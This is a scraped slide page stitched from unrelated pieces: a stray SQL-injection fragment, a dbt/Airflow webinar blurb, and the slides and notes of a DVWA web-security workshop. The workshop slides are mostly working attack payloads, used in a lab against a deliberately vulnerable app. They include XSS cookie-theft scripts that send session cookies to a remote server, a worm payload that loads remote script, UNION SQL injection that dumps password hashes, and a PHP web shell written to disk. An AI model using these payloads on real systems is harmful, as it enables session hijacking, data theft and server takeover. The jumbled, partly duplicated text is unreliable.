   lampp/htdocs/hackable/uploads/shell.phpʼ #ʼ ../../../../../etc/passwd -c 3

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Best Practices for Effectively Running dbt in Airflow.pdf
Best Practices for Effectively Running dbt in Airflow.pdfBest Practices for Effectively Running dbt in Airflow.pdf
Best Practices for Effectively Running dbt in Airflow.pdf

As a popular open-source library for analytics engineering, dbt is often used in combination with Airflow. Orchestrating and executing dbt models as DAGs ensures an additional layer of control over tasks, observability, and provides a reliable, scalable environment to run dbt models. This webinar will cover a step-by-step guide to Cosmos, an open source package from Astronomer that helps you easily run your dbt Core projects as Airflow DAGs and Task Groups, all with just a few lines of code. We’ll walk through: - Standard ways of running dbt (and when to utilize other methods) - How Cosmos can be used to run and visualize your dbt projects in Airflow - Common challenges and how to address them, including performance, dependency conflicts, and more - How running dbt projects in Airflow helps with cost optimization Webinar given on 9 July 2024

apache airflowdbtdbt-core
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DVWA BruCON Workshop
Further Reading
DVWA BruCON Workshop

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DVWA BruCON Workshop

  • 3. The boring part. zzzz... <head> Ryan Dewhurst RandomStorm Northumbria University @ethicalhack3r </head> Damn Vulnerable Web App
  • 5. What are we doing today? Introduction to Web Application Security Introduction to DVWA Using DVWA Demos DVWA 2.0 codename ʻIveyʼ Questions
  • 6. Client Application Database
  • 7. What is a Web Application? Client Application Database
  • 8. GET /index.html HTTP/1.1 1xx - Informational Host: 2xx - Successful request 3xx - Redirection 4xx - Client error 5xx - Server error GET - Retrieve resource POST - Perform action HEAD - Like GET OPTIONS - Report methods TRACE - Debugging PUT - Upload resource
  • 9. Hypertext Transfer Protocol (HTTP) GET /index.html HTTP/1.1 1xx - Informational Host: 2xx - Successful request 3xx - Redirection 4xx - Client error HTTP/1.1 200 OK 5xx - Server error Date: Fri, 10 Sep 2010 17:59:00 GMT Server: Apache GET - Retrieve resource <html> POST - Perform action <head></head> HEAD - Like GET <body> OPTIONS - Report methods <h1>It worked!</h1> TRACE - Debugging </body> PUT - Upload resource </html>
  • 10. The average website had nearly 13 serious vulnerabilities.
  • 11. Web Application (In)security The average website had nearly 13 serious vulnerabilities.
  • 12. Client Firewall Web Server 23 80 139
  • 13. Web Application (In)security Client Firewall Web Server 23 80 139
  • 15. Web Application (In)security Information Gathering - Spider, Search Engines, Application Discovery Configuration Management - HTTP Methods, Admin Interfaces, Forgotten Files Business Logic - Bypassable Business Logic Authentication - Use of Encryption, Brute Force, Bypass, CAPTCHA Authorisation - Path Traversal, Privilege Escalation Session Management - Cookies, Session Management, Session Fixation Data Validation - XSS, SQLi, OS Commanding, HTTP Splitting, XML Injection Denial of Service - SQL Wildcard, Locking Accounts, Storing too much data Web Service - Testing WSDL, REST, SOAP
  • 18. Header Information Leakage $nc 80 GET /login.php HTTP/1.0
  • 20. Header Information Leakage HTTP/1.1 200 OK Date: {todays date/time} Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.81 PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v.5.10.1 X-Powered-By: PHP/5.3.1 Set-Cookie: PHPSESSID={your session id} path=/ Set Cookie: security=high <html> </html>
  • 21. Server X-Powered-By $sudo nano /opt/lampp/etc/httpd.conf - ServerTokens Prod $sudo /opt/lampp/lampp restart
  • 22. Header Information Leakage Server X-Powered-By $sudo nano /opt/lampp/etc/httpd.conf $sudo nano /opt/lampp/etc/php.ini -c - ServerTokens Prod - 433:expose_php = Off $sudo /opt/lampp/lampp restart
  • 24. Cross Site Scripting (XSS) Even the biggest and baddest get it wrong: Google (biggest) Yahoo YouTube Facebook (baddest) MySpace Microsoft EBay Twitter?! The list goes on and on... Source:
  • 26. Cross Site Scripting (XSS) <plaintext> '';!--"<XSS>=&{()} <script>alert(1)</script>
  • 28. Cross Site Scripting (XSS) Remote scripts <script src=></script> Cookie stealing <script>document.location="" + document.cookie</script> Grab NATed IP JavaScript port scanner Defacement <script>document.body.innerHTML=”Rick Astley”</script> Source:,
  • 30. Cross Site Scripting (XSS) # # www.w.ww/@"style="position:absolute;margin-top:-900px;margin-left:-900px;width: 9999em;height:9999em"onmouseover=alert(document.cookie)//"onmouseover="document.getElementById('status').value='RT MoiMrJack';$('.status- update-form').submit();"font-size:500pt;/ $('#status').val(""style="font-size:999999999999px;"onmouseover="$.getScript('http: u002fu002fis.gdu002ffl9A7')"/");$('.status-update-form').submit();
  • 32. Cross Site Scripting (XSS) Filter user supplied input/output. White list! Browser: IE, Opera, Firefox (with NoScript plugin) Web Application Firewall (WAF) Web Development Framework Cookies: HTTPOnly flag, restrict domain+path scope
  • 34. Cross Site Scripting (XSS) <sCrIpT>alert(1)</sCrIpT> <scr<script>ipt>alert(1)</scr</script> ipt> <img src=”” onerror=”alert(1)”> &lt;script&gt;alert(1)&lt;/script&gt; String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 97, 108, 101, 114, 116, 40, 49, 41, 60, 47, 115, 99, 114, 105, 112, 116, 62)
  • 36. Creating a vulnerable site Log in Go to the DVWA Security menu on the left Change the security level to low Disable NoScript
  • 38. Checking for HTML Injection We are going to look for reflected XSS, start simple Go to the XSS reflected page and enter the following <b>test</b>ABC
  • 40. Checking for Script Injection Now we know we can inject HTML lets go for the classic XSS attack. Enter <script>alert('XSS')</script> This is where most people stop
  • 42. Lets see if we can see the cookie See if we can see the session cookie <script>alert(document.cookie)</script> This is OUR cookie, not much use, yet
  • 44. Requesting images This is where you have to use your imagination. Lets request an “image” from a remote server <img src="http://localhost/cookie_steal_image.html" > Normally you would use an IP from a machine you control and not localhost but localhost will have to do for now as we donʼt have network connections
  • 46. Lets check the logs Bring up a terminal and tail the Apache web logs tail -f /opt/lampp/log/access.log Look for the entry for cookie_steal_image.html
  • 48. Whats happening? We have just requested an image from a server we control If we can get a victim to trigger that XSS we will be informed when they hit it if we are watching our apache logs
  • 50. Tying the two together We can make a request to our server We can access the cookie Can we tie the two together and send the cookie to our server? Yes....
  • 52. What we canʼt do We canʼt do this <img src=”http://localhost/steal_cookie_image.html? document.cookie”> Because this would request the literal string specified in the quotes
  • 54. Dynamically requesting images So we have to dynamically create the image request <script>document.write('<img src="http://localhost/ cookie_steal_image.html">')</script> This will do the same as the original image request but it is created through JavaScript
  • 56. Dynamically requesting images And JavaScript can access the cookie <script>document.write('<img src="http://localhost/ cookie_steal_image.html?' + escape(document.cookie) + '>');</script> The escape is needed to HTML encode the cookie. This stops “bad” characters from breaking the image request.
  • 58. Now check your logs again /cookie_steal_image.html?security%3Dlow%3B %20PHPSESSID %3D1h76ngv5le4i832a0ptu2s8ag1%3E%3Cpre%3E %3C/pre%3E%3C/div%3E%3Ch2%3EMore%20info %3C/h2%3E%3Cul%3E%3Cli%3E%3Ca%20href= Or /cookie_steal_image.html? security=low; %20PHPSESSID=225ejsvuc0uf5sjt9vpao2ovk3
  • 60. Setting the cookie You can now use Add ʻnʼ Edit cookies or Web Developer Toolbar or all sorts of other tools to set that cookie into your browser Unfortunately DVWA Live CD doesnʼt have these installed
  • 62. How do we get the URL to the user? So, we have generated this great attack, how do we get it to the user? Check the querystring, it should look something like http://localhost/dvwa/vulnerabilities/xss_r/? name=<script>document.write('<img+src%3D"http%3A %2F%2Flocalhost%2Fcookie_steal_image.html%3F'+ %2B+escape(document.cookie)+%2B+'>')%3B< %2Fscript> You can think of ways to send this to victim
  • 64. SQL Injection $query = “SELECT * FROM users WHERE username=ʻ$userʼ AND password=ʻ$passʼ ”; $query = “SELECT * FROM users WHERE username=ʻryanʼ AND password=ʻ123456ʼ ”;
  • 66. SQL Injection $query = “SELECT * FROM users WHERE username=ʻʼʼ AND password=ʻ123456ʼ ”; $query = “SELECT * FROM users WHERE username=ʻadminʼ -- ʼ AND password=ʻ123456ʼ ”;
  • 68. SQL Injection SELECT first_name, last_name FROM users WHERE user_id=ʼ1ʼ ID: 1 First name: admin Surname: admin
  • 70. SQL Injection SELECT first_name, last_name FROM users WHERE user_id=ʻOʼMalleyʼ You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ʻʼ” at line 1
  • 72. SQL Injection SELECT first_name, last_name FROM users WHERE user_id=ʻ1ʼ OR 1=1 #ʼ ID: 1ʼ OR 1=1# First name: admin Surname: admin ID: 1ʼ OR 1=1# First name: Gordon Surname: Brown ID: 1ʼ OR 1=1# First name: Hack Surname: Me ID: 1ʼ OR 1=1# First name: Pablo Surname: Picasso ID: 1ʼ OR 1=1# First name: bob Surname: smith
  • 74. SQL Injection Find number of columns SELECT first_name, last_name FROM users WHERE user_id=ʻ1ʼ ORDER BY 1 #ʼ
  • 76. SQL Injection Find field names SELECT first_name, last_name FROM users WHERE user_id=ʻaʼ OR username = ʻadminʼ -- ʼ Unknown column ʻusernameʼ in ʻwhere clauseʼ
  • 78. SQL Injection Find database name SELECT first_name, last_name FROM users WHERE user_id=ʻaʼ UNION SELECT null,database() # ʼ ID: aʼ UNION SELECT null,database() # First name: Surname: dvwa
  • 80. SQL Injection Find table name SELECT first_name, last_name FROM users WHERE user_id=ʻaʼ UNION SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema = ʻdvwaʼ #ʼ ID: aʼ UNION SELECT table_schema... First name: dvwa Surname: guestbook ID: aʼ UNION SELECT table_schema... First name: dvwa Surname: users
  • 82. SQL Injection Extract passwords SELECT first_name, last_name FROM users WHERE user_id=ʻaʼ UNION SELECT user,password FROM users #ʼ ID: aʼ UNION SELECT user,password FROM users # First name: admin Surname: 5f4dcc3b5aa765d61d8327deb882cf99 ID: aʼ UNION SELECT user,password FROM users # First name: gordonb Surname: 5f4dcc3b5aa765d61d8327deb882cf99
  • 84. SQL Injection Create PHP backdoor SELECT first_name, last_name FROM users WHERE user_id=ʻaʼ UNION SELECT null,ʼ<?php system($_GET[ʻcmdʼ]); ?>ʼ INTO OUTFILE ʻ/opt/ lampp/htdocs/hackable/uploads/shell.phpʼ #ʼ ../../../../../etc/passwd -c 3

Editor's Notes

  1. Introduce myself
  2. Outline the workshop
  3. Outline the workshop
  4. Explain a three tier web application architecture, request process, server software, languages, DBMSs
  5. Brief overview of HTTP: RFC 2616 Application layer of TCP/IP suite Versions: 0.9,1.0 and 1.1 Stateless protocol Tim Berners-Lee
  6. Brief overview of HTTP: RFC 2616 Application layer of TCP/IP suite Versions: 0.9,1.0 and 1.1 Stateless protocol Tim Berners-Lee
  7. What are slides without stats. WhiteHat Security, 2000 websites, PCI
  8. Explain why web applications are insecure in a general sense, accessibility, developer awareness, time/budget constraints, vendors, easy targets.
  9. Explain what a web application assessment entails, blackbox vs whitebox, automation, manual testing, methodologies.
  10. Explain what a web application assessment entails, blackbox vs whitebox, automation, manual testing, methodologies.
  11. Introduce dvwa, background, use, where it is today, etc...
  12. Recommended books